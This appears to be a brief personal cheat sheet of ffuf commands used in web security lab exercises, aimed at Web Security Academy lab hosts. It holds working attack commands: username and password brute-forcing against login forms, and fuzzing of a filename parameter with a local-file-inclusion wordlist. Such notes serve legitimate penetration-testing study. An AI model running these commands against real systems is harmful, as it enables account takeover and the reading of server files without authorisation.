ffuf

# Save the request to req.txt from burp
# -mc is we are looking for specific status code 
# it will only return 302 status code
ffuf -request req.txt -request-proto https -mode clusterbomb -w usernames.txt:FUZZUSER -w passwords.txt:FUZZPASS -mc 302

ffuf -w passwords.txt:FUZZ -u https://0abf00b50407080a830c0211000700b6.web-security-academy.net/login -X POST -d 'username=al&password=FUZZ' -H "Content-Type: application/x-www-form-urlencoded"

ffuf -request req.txt -request-proto https -w number0-254.txt:FUZZ -fc 500

ffuf -u https://0ab300ac043f1a0e80ff85b600e600bd.web-security-academy.net/image?filename=FUZZ -w /usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-Jhaddix.txt

Previousfind NextWeb pen

Last updated 6 months ago